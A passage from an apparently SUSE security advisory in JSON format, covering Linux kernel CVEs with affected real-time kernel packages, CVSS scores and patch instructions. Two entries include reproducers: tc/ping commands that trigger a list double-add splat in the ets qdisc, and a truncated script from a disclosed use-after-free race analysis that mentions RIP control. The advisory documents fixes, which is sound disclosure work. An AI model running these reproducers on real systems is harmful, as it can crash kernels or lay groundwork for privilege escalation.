"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/sched: ets: Remove drr class from the active list if it changes to strict\n\nWhenever a user issues an ets qdisc change command, transforming a\ndrr class into a strict one, the ets code isn\u0027t checking whether that\nclass was in the active list and removing it. This means that, if a\nuser changes a strict class (which was in the active list) back to a drr\none, that class will be added twice to the active list [1].\n\nDoing so with the following commands:\n\ntc qdisc add dev lo root handle 1: ets bands 2 strict 1\ntc qdisc add dev lo parent 1:2 handle 20: \\\n tbf rate 8bit burst 100b latency 1s\ntc filter add dev lo parent 1: basic classid 1:2\nping -c1 -W0.01 -s 56 127.0.0.1\ntc qdisc change dev lo root handle 1: ets bands 2 strict 2\ntc qdisc change dev lo root handle 1: ets bands 2 strict 1\nping -c1 -W0.01 -s 56 127.0.0.1\n\nWill trigger the following splat with list debug turned on:\n\n[ 59.279014][ T365] ------------[ cut here ]------------\n[ 59.279452][ T365] list_add double add: new=ffff88801d60e350, prev=ffff88801d60e350, next=ffff88801d60e2c0.\n[ 59.280153][ T365] WARNING: CPU: 3 PID: 365 at lib/list_debug.c:35 __list_add_valid_or_report+0x17f/0x220\n[ 59.280860][ T365] Modules linked in:\n[ 59.281165][ T365] CPU: 3 UID: 0 PID: 365 Comm: tc Not tainted 6.18.0-rc7-00105-g7e9f13163c13-dirty #239 PREEMPT(voluntary)\n[ 59.281977][ T365] Hardware name: Bochs Bochs, BIOS Bochs 01/01/2011\n[ 59.282391][ T365] RIP: 0010:__list_add_valid_or_report+0x17f/0x220\n[ 59.282842][ T365] Code: 89 c6 e8 d4 b7 0d ff 90 0f 0b 90 90 31 c0 e9 31 ff ff ff 90 48 c7 c7 e0 a0 22 9f 48 89 f2 48 89 c1 4c 89 c6 e8 b2 b7 0d ff 90 \u003c0f\u003e 0b 90 90 31 c0 e9 0f ff ff ff 48 89 f7 48 89 44 24 10 4c 89 44\n...\n[ 59.288812][ T365] Call Trace:\n[ 59.289056][ T365] \u003cTASK\u003e\n[ 59.289224][ T365] ? srso_alias_return_thunk+0x5/0xfbef5\n[ 59.289546][ T365] ets_qdisc_change+0xd2b/0x1e80\n[ 59.289891][ T365] ? __lock_acquire+0x7e7/0x1be0\n[ 59.290223][ T365] ? __pfx_ets_qdisc_change+0x10/0x10\n[ 59.290546][ T365] ? srso_alias_return_thunk+0x5/0xfbef5\n[ 59.290898][ T365] ? __mutex_trylock_common+0xda/0x240\n[ 59.291228][ T365] ? __pfx___mutex_trylock_common+0x10/0x10\n[ 59.291655][ T365] ? srso_alias_return_thunk+0x5/0xfbef5\n[ 59.291993][ T365] ? srso_alias_return_thunk+0x5/0xfbef5\n[ 59.292313][ T365] ? trace_contention_end+0xc8/0x110\n[ 59.292656][ T365] ? srso_alias_return_thunk+0x5/0xfbef5\n[ 59.293022][ T365] ? srso_alias_return_thunk+0x5/0xfbef5\n[ 59.293351][ T365] tc_modify_qdisc+0x63a/0x1cf0\n\nFix this by always checking and removing an ets class from the active list\nwhen changing it to strict.\n\n[1] https://git.kernel.org/pub/scm/linux/kernel/git/netdev/net.git/tree/net/sched/sch_ets.c?id=ce052b9402e461a9aded599f5b47e76bc727f7de#n663",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68815",
"url": "https://www.suse.com/security/cve/CVE-2025-68815"
},
{
"category": "external",
"summary": "SUSE Bug 1256680 for CVE-2025-68815",
"url": "https://bugzilla.suse.com/1256680"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-20T10:04:28Z",
"details": "moderate"
}
],
"title": "CVE-2025-68815"
},
{
"cve": "CVE-2025-68816",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68816"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/mlx5: fw_tracer, Validate format string parameters\n\nAdd validation for format string parameters in the firmware tracer to\nprevent potential security vulnerabilities and crashes from malformed\nformat strings received from firmware.\n\nThe firmware tracer receives format strings from the device firmware and\nuses them to format trace messages. Without proper validation, bad\nfirmware could provide format strings with invalid format specifiers\n(e.g., %s, %p, %n) that could lead to crashes, or other undefined\nbehavior.\n\nAdd mlx5_tracer_validate_params() to validate that all format specifiers\nin trace strings are limited to safe integer/hex formats (%x, %d, %i,\n%u, %llx, %lx, etc.). Reject strings containing other format types that\ncould be used to access arbitrary memory or cause crashes.\nInvalid format strings are added to the trace output for visibility with\n\"BAD_FORMAT: \" prefix.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68816",
"url": "https://www.suse.com/security/cve/CVE-2025-68816"
},
{
"category": "external",
"summary": "SUSE Bug 1256674 for CVE-2025-68816",
"url": "https://bugzilla.suse.com/1256674"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-20T10:04:28Z",
"details": "moderate"
}
],
"title": "CVE-2025-68816"
},
{
"cve": "CVE-2025-68819",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68819"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmedia: dvb-usb: dtv5100: fix out-of-bounds in dtv5100_i2c_msg()\n\nrlen value is a user-controlled value, but dtv5100_i2c_msg() does not\ncheck the size of the rlen value. Therefore, if it is set to a value\nlarger than sizeof(st-\u003edata), an out-of-bounds vuln occurs for st-\u003edata.\n\nTherefore, we need to add proper range checking to prevent this vuln.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68819",
"url": "https://www.suse.com/security/cve/CVE-2025-68819"
},
{
"category": "external",
"summary": "SUSE Bug 1256664 for CVE-2025-68819",
"url": "https://bugzilla.suse.com/1256664"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-20T10:04:28Z",
"details": "moderate"
}
],
"title": "CVE-2025-68819"
},
{
"cve": "CVE-2025-68820",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68820"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\next4: xattr: fix null pointer deref in ext4_raw_inode()\n\nIf ext4_get_inode_loc() fails (e.g. if it returns -EFSCORRUPTED),\niloc.bh will remain set to NULL. Since ext4_xattr_inode_dec_ref_all()\nlacks error checking, this will lead to a null pointer dereference\nin ext4_raw_inode(), called right after ext4_get_inode_loc().\n\nFound by Linux Verification Center (linuxtesting.org) with SVACE.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68820",
"url": "https://www.suse.com/security/cve/CVE-2025-68820"
},
{
"category": "external",
"summary": "SUSE Bug 1256754 for CVE-2025-68820",
"url": "https://bugzilla.suse.com/1256754"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:N/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-20T10:04:28Z",
"details": "moderate"
}
],
"title": "CVE-2025-68820"
},
{
"cve": "CVE-2025-71064",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71064"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: hns3: using the num_tqps in the vf driver to apply for resources\n\nCurrently, hdev-\u003ehtqp is allocated using hdev-\u003enum_tqps, and kinfo-\u003etqp\nis allocated using kinfo-\u003enum_tqps. However, kinfo-\u003enum_tqps is set to\nmin(new_tqps, hdev-\u003enum_tqps); Therefore, kinfo-\u003enum_tqps may be smaller\nthan hdev-\u003enum_tqps, which causes some hdev-\u003ehtqp[i] to remain\nuninitialized in hclgevf_knic_setup().\n\nThus, this patch allocates hdev-\u003ehtqp and kinfo-\u003etqp using hdev-\u003enum_tqps,\nensuring that the lengths of hdev-\u003ehtqp and kinfo-\u003etqp are consistent\nand that all elements are properly initialized.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71064",
"url": "https://www.suse.com/security/cve/CVE-2025-71064"
},
{
"category": "external",
"summary": "SUSE Bug 1256654 for CVE-2025-71064",
"url": "https://bugzilla.suse.com/1256654"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-20T10:04:28Z",
"details": "moderate"
}
],
"title": "CVE-2025-71064"
},
{
"cve": "CVE-2025-71066",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71066"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/sched: ets: Always remove class from active list before deleting in ets_qdisc_change\n\nzdi-disclosures@trendmicro.com says:\n\nThe vulnerability is a race condition between `ets_qdisc_dequeue` and\n`ets_qdisc_change`. It leads to UAF on `struct Qdisc` object.\nAttacker requires the capability to create new user and network namespace\nin order to trigger the bug.\nSee my additional commentary at the end of the analysis.\n\nAnalysis:\n\nstatic int ets_qdisc_change(struct Qdisc *sch, struct nlattr *opt,\n struct netlink_ext_ack *extack)\n{\n...\n\n // (1) this lock is preventing .change handler (`ets_qdisc_change`)\n //to race with .dequeue handler (`ets_qdisc_dequeue`)\n sch_tree_lock(sch);\n\n for (i = nbands; i \u003c oldbands; i++) {\n if (i \u003e= q-\u003enstrict \u0026\u0026 q-\u003eclasses[i].qdisc-\u003eq.qlen)\n list_del_init(\u0026q-\u003eclasses[i].alist);\n qdisc_purge_queue(q-\u003eclasses[i].qdisc);\n }\n\n WRITE_ONCE(q-\u003enbands, nbands);\n for (i = nstrict; i \u003c q-\u003enstrict; i++) {\n if (q-\u003eclasses[i].qdisc-\u003eq.qlen) {\n\t\t // (2) the class is added to the q-\u003eactive\n list_add_tail(\u0026q-\u003eclasses[i].alist, \u0026q-\u003eactive);\n q-\u003eclasses[i].deficit = quanta[i];\n }\n }\n WRITE_ONCE(q-\u003enstrict, nstrict);\n memcpy(q-\u003eprio2band, priomap, sizeof(priomap));\n\n for (i = 0; i \u003c q-\u003enbands; i++)\n WRITE_ONCE(q-\u003eclasses[i].quantum, quanta[i]);\n\n for (i = oldbands; i \u003c q-\u003enbands; i++) {\n q-\u003eclasses[i].qdisc = queues[i];\n if (q-\u003eclasses[i].qdisc != \u0026noop_qdisc)\n qdisc_hash_add(q-\u003eclasses[i].qdisc, true);\n }\n\n // (3) the qdisc is unlocked, now dequeue can be called in parallel\n // to the rest of .change handler\n sch_tree_unlock(sch);\n\n ets_offload_change(sch);\n for (i = q-\u003enbands; i \u003c oldbands; i++) {\n\t // (4) we\u0027re reducing the refcount for our class\u0027s qdisc and\n\t // freeing it\n qdisc_put(q-\u003eclasses[i].qdisc);\n\t // (5) If we call .dequeue between (4) and (5), we will have\n\t // a strong UAF and we can control RIP\n q-\u003eclasses[i].qdisc = NULL;\n WRITE_ONCE(q-\u003eclasses[i].quantum, 0);\n q-\u003eclasses[i].deficit = 0;\n gnet_stats_basic_sync_init(\u0026q-\u003eclasses[i].bstats);\n memset(\u0026q-\u003eclasses[i].qstats, 0, sizeof(q-\u003eclasses[i].qstats));\n }\n return 0;\n}\n\nComment:\nThis happens because some of the classes have their qdiscs assigned to\nNULL, but remain in the active list. This commit fixes this issue by always\nremoving the class from the active list before deleting and freeing its\nassociated qdisc\n\nReproducer Steps\n(trimmed version of what was sent by zdi-disclosures@trendmicro.com)\n\n```\nDEV=\"${DEV:-lo}\"\nROOT_HANDLE=\"${ROOT_HANDLE:-1:}\"\nBAND2_HANDLE=\"${BAND2_HANDLE:-20:}\" # child under 1:2\nPING_BYTES=\"${PING_BYTES:-48}\"\nPING_COUNT=\"${PING_COUNT:-200000}\"\nPING_DST=\"${PING_DST:-127.0.0.1}\"\n\nSLOW_TBF_RATE=\"${SLOW_TBF_RATE:-8bit}\"\nSLOW_TBF_BURST=\"${SLOW_TBF_BURST:-100b}\"\nSLOW_TBF_LAT=\"${SLOW_TBF_LAT:-1s}\"\n\ncleanup() {\n tc qdisc del dev \"$DEV\" root 2\u003e/dev/null\n}\ntrap cleanup EXIT\n\nip link set \"$DEV\" up\n\ntc qdisc del dev \"$DEV\" root 2\u003e/dev/null || true\n\ntc qdisc add dev \"$DEV\" root handle \"$ROOT_HANDLE\" ets bands 2 strict 2\n\ntc qdisc add dev \"$DEV\" parent 1:2 handle \"$BAND2_HANDLE\" \\\n tbf rate \"$SLOW_TBF_RATE\" burst \"$SLOW_TBF_BURST\" latency 